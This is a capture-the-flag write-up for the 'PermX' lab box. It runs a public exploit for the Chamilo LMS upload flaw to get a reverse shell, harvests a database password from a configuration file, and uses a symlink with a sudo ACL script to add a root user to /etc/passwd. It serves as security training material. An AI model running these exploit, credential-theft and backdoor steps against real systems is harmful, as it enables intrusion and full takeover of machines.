# PermX

## Nmap Scan

```
$ nmap -sC -sV -p- --min-rate 10000 -Pn -oN nmap 10.10.11.23                
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-31 00:58 EDT
Warning: 10.10.11.23 giving up on port because retransmission cap hit (10).
Nmap scan report for permx.htb (10.10.11.23)
Host is up (0.079s latency).
Not shown: 38312 filtered tcp ports (no-response), 27221 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
|_  256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: eLEARNING
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.61 seconds
```

## Initial Access

### Port 80

First we will add the IP to our host file

```
$ echo "10.10.11.23 permx.htb" | sudo tee -a /etc/hosts                                                                               
[sudo] password for kali: 
10.10.11.23 permx.htb
```

When we visit the webpage, we are greeted with this.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FnqiBdnvUKc5yUU5BSX54%2Fimage.png?alt=media&#x26;token=aec3bbf2-18f4-474b-88ee-8b1f56e647bb" alt=""><figcaption></figcaption></figure>

However, there is nothing much after reading the source code of the website.

### Subdomain Enumeration

Next we will enumerate the subdomains.

{% code overflow="wrap" %}

```
$ wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.permx.htb" --hw 475 -t 100 10.10.11.23
...
000000477:   200        352 L    940 W      19347 Ch    "lms" 
...
```

{% endcode %}

We can see that `lms` will returns us with status code of 200.

First, we need to add to our host file.

```
$ echo "10.10.11.23 lms.permx.htb" | sudo tee -a /etc/hosts
10.10.11.23 lms.permx.htb
```

After adding to the host file and visiting the URL, we are greeted with this login page.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FaJQSEr5XlrF806TPGHpx%2Fimage.png?alt=media&#x26;token=271e4509-f674-4af3-8536-207b2556a7ba" alt=""><figcaption></figcaption></figure>

### **CVE-2023-4220**

After searching online if there is any exploits related to this application, there is an exploit that is available.

{% embed url="<https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc>" %}

```
$ git clone https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc
$ cd chamilo-lms-unauthenticated-big-upload-rce-poc
$ pip install -r requirements.txt
```

After that, we will check if the website is vulnerable.

```
$ python3 main.py -u http://lms.permx.htb -a scan 
```

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FIvADQJySkMFqnwJ5EAij%2Fimage.png?alt=media&#x26;token=ee20fe49-fa78-4081-b0ca-cb05277b6ff1" alt=""><figcaption></figcaption></figure>

After that, we will run the command to get the reverse shell

```
$ python3 main.py -u http://lms.permx.htb -a revshell
```

After running it, we should be able to get a reverse shell.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FIRTSZxHJspXKqwG5Y7lN%2Fimage.png?alt=media&#x26;token=ff447200-c147-4526-aef4-241e402d2d33" alt=""><figcaption></figcaption></figure>

### Upgrading shell

We will use [upgrading-shells](https://jasons-organization-25.gitbook.io/security-stuff/boxes-methodology/reverse-shell-payloads/upgrading-shells "mention").

### Password in configuration files

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FeZFEUJxJ8dCFVd8GRhVs%2Fimage.png?alt=media&#x26;token=867c9446-bc10-4985-8236-e829a848bd1d" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FVY7Io6zdAvZtF0unwGpy%2Fimage.png?alt=media&#x26;token=781f2bc9-176e-4e9a-83ed-ce678a39788d" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FSUZ370FcfRmO71FlGSef%2Fimage.png?alt=media&#x26;token=ec7a5458-e429-4cd4-9cbe-04d73d5ff5ff" alt=""><figcaption></figcaption></figure>

After some enumeration using linpeas, we can see that in `configuration.php`, it contains the password.

```
/var/www/chamilo/app/config/configuration.php:$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
/var/www/chamilo/app/config/configuration.php:$_configuration['password_encryption'] = 'bcrypt';
03F6lY3uXAP2bkW8
```

We also can see that the username is mtz.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2Fyr25xRIEtpIPGwOjTyD6%2Fimage.png?alt=media&#x26;token=4aee8ebb-8a24-4808-9ffc-a1a4c1aa6da3" alt=""><figcaption></figcaption></figure>

With these information, we should be able to login as `mtz` using ssh.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FwyUibbBqqvPwRompTLUg%2Fimage.png?alt=media&#x26;token=d64bc103-99c7-4565-bfde-70953b7fcea9" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

### Running script using sudo

After running `sudo -l`, we can see that the user is able to run a script at `/opt/acl.sh` as `root`.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FtP2BUEn3KdktKBIneApP%2Fimage.png?alt=media&#x26;token=bddc734f-8130-479b-bad8-db52b25b7aeb" alt=""><figcaption></figcaption></figure>

If we visit that script, this is what is inside of the script.

```bash
#!/bin/bash

if [ "$#" -ne 3 ]; then
    /usr/bin/echo "Usage: $0 user perm file"
    exit 1
fi

user="$1"
perm="$2"
target="$3"

if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
    /usr/bin/echo "Access denied."
    exit 1
fi

# Check if the path is a file
if [ ! -f "$target" ]; then
    /usr/bin/echo "Target must be a file."
    exit 1
fi

/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"
```

It will only allow me to change the ACL if the file is located in the user home folder.

However, we can create a symlink to link to `/`.

```
$ ln -s / root
```

From there we can change the ACL to allow access for the current user.

```
$ sudo /opt/acl.sh mtz rwx /home/mtz/root/etc/passwd
```

After which, we can modify `/etc/passwd`

```
$ openssl passwd 123
$ echo 'user3:$1$4XXWqVcf$oTXWs68MHRnK1b6iNPqDn1:0:0:root:/root:/bin/bash' >> /etc/passwd
```

With that, we are able to login as `user3` who have root access.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2F0KBH7tNYmuhcIBFC2U9Q%2Fimage.png?alt=media&#x26;token=cae7a0ed-8e5c-48f2-8770-17032928c1a3" alt=""><figcaption></figcaption></figure>